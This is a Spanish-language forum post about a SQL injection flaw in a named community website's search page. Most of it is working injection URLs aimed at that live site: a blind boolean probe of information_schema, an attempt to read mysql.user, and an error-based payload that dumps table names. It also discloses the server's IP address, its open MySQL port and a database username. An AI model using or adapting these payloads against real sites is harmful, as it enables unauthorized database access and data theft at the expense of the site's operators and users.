Segúramente se refiere a que encontró un bug en el sitio web y por el contexto se asume que no "descubrió" el método, aunque igualmente considero absurdo discutir quién utilizó por primera vez un método tan elemental basado en el principio de inyección de código.
Fácilmente se puede explotar con substring, length, etc si lo que se pretende es leer datos específicos. La versión "5.0.92-community" tiene information_schema.tables.
http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/information_schema.tables/**/WHERE/**/substring(table_name,1,10)='collations'/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1
Da pereza extraer datos mediante blind por lo que también puedes generar mensajes de error -
lástima que no puedas leer mysql.user y mucho menos en esta versión de MySQL- :
http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/mysql.user/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1
SELECT command denied to user 'tumusica_new'@'localhost' for table 'user'
O conectarte al puerto de MySQL (el servidor lo tiene abierto) :
comunidad.onlypost.net [190.210.100.80] 3306 (?) open
>
5.0.92-community K÷é ^?]8?rD9 ,☻ 207bheDa;D%'
O incluso generar mensajes de error para extraer datos :
http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND(SELECT/**/1/**/FROM(SELECT/**/count(*),concat((SELECT/**/(SELECT/**/(SELECT/**/distinct/**/concat(0x7e,0x27,unhex(Hex(cast(table_name/**/AS/**/char))),0x27,0x7e)/**/FROM/**/information_schema.tables/**/LIMIT/**/1,1))/**/FROM/**/information_schema.tables/**/LIMIT/**/0,1),floor(rand(0)*2))x/**/FROM/**/information_schema.tables/**/group/**/by/**/x)a)/**/AND/**/'1'='1&tipo_buscador2=temas&cat=-1